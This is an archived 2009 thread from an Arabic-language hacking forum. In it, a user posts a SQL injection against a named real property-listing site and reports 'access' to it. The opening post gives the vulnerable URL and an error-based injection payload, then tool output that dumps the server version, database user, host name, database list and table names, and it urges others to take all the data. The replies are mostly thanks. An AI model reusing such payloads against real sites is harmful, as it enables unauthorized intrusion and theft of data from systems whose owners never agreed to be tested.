:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   Access (99%) to msn.com.tw /by bl4ck(; (http://www.vbspiders.com/vb/t17711.html)

bl4ck 08-15-2009 07:51 AM

Access (99%) to msn.com.tw /by bl4ck(;
 
كود:

http://buy.house.msn.com.tw/search_list.php?city1='
Start exploiting... bl4ck MSSQL Running...

كود:

http://buy.house.msn.com.tw/search_list.php?city1='+or+1=convert(int,(SELECT @@version))--
اقتباس:

[+] @@VERSION: Microsoft SQL Server 2000 - 8.00.2055 (Intel X86)
Dec 16 2008 19:46:53
Copyright (c) 1988-2003 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
اقتباس:

[+] USER: dbo
[+] DB_NAME(): Egoupload
[+] HOST_NAME(): ubuntu-home
[+] Displaying list of all databases on MSSQL host!

اقتباس:

[0] Egoupload
[1] master
[2] tempdb
[3] model
[4] msdb
[5] pubs
[6] Northwind
[7] Egoupload
================================================== =============================

[+] Displaying tables inside DB: Egoupload

اقتباس:

[0] dtproperties
[1] foofoofoo
[2] HSARS
[3] HSBSMG
[4] Land_administrator
[5] MSreplication_subscriptions
[6] MSsubscription_agents
[7] POINDENT
[8] PSDEPT
[9] PSMAN
[10] PSPERSON1
[11] syscommand
[12] sysconstraints
[13] syssegments
[14] t
[15] t_t
[16] TOP100
[17] tt
[18] ttt
[19] ĄŻÂÚŞŕ«Ă¬Ý
[20] ęe»▓ŽĘąŠŞŕ«Ă¬Ý
[21] ęe»▓¬źąˇŞŕ«Ă¬Ý
[22] ęeŻŠŽĘąŠŞŕ«Ă¬Ý
[23] ęeŻŠŽĘąŠŞŕ«Ă¬Ý_TOP100
[24] ęeŻŠ¬źąˇŞŕ«Ă¬Ý
[25] Şŕ«Ă_Ąj▒M░|«Ň
[26] Şŕ«Ă_¬źąˇą╬│~
[27] Şŕ«Ă_¬źąˇ├■žO
[28] Şŕ«Ă_░¬ĄĄ
[29] Şŕ«Ă_░¬┼K
[30] Şŕ«Ă_░ŕĄp
[31] Şŕ«Ă_░॥
[32] Şŕ«Ă_▒Â╣B
[33] Şŕ«Ă_Âm┬Ýąź░¤
[34] Şŕ«Ă_╣DŞ˘
[35] ║ŰÁěą═Čí░ÚŞŕ«Ă¬Ý
[+] Displaying tables inside DB: Northwind

اقتباس:

[0] Alphabetical list of products
[1] Categories
[2] Category Sales for 1997
[3] Current Product List
[4] Customer and Suppliers by City
[5] CustomerCustomerDemo
[6] CustomerDemographics
[7] Customers
[8] dtproperties
[9] Employees
[10] EmployeeTerritories
[11] Invoices
[12] MSreplication_subscriptions
[13] MSsubscription_agents
[14] Order Details
[15] Order Details Extended
[16] Order Subtotals
[17] Orders
[18] Orders Qry
[19] Product Sales for 1997
[20] Products
[21] Products Above Average Price
[22] Products by Category
[23] Quarterly Orders
[24] Region
[25] Sales by Category
[26] Sales Totals by Amount
[27] Shippers
[28] Summary of Sales by Quarter
[29] Summary of Sales by Year
[30] Suppliers
[31] sysconstraints
[32] syssegments
[33] Territories
[34] ęe»▓¬źąˇŞŕ«Ă¬Ý

if you would you can get all db;) and database;) you only need good command;) I don't need this... so I share this :D

Have a fun boys ;D

Miss Hacker 08-17-2009 08:34 PM

ممكن توضح اكثر

bl4ck 08-18-2009 12:13 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة Miss Hacker (المشاركة 64288)
ممكن توضح اكثر

I have a lot of more information;)
but I don't post it;)
you can penetrate all server bro;)

MasTer MiND 08-18-2009 02:09 AM

good work
i don't need it too :37:

bye bye

Dr.Alaa 08-18-2009 05:46 PM

thanks black

good work

KaLa$nikoV 08-23-2009 04:49 PM

waw

thx bl4ck

good work

thx too

zakaria-10 08-23-2009 07:26 PM

good work
اعتقد انها مو Sql inejction

zaky092 09-29-2009 01:36 AM

بارك الله فيك


الساعة الآن 05:24 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0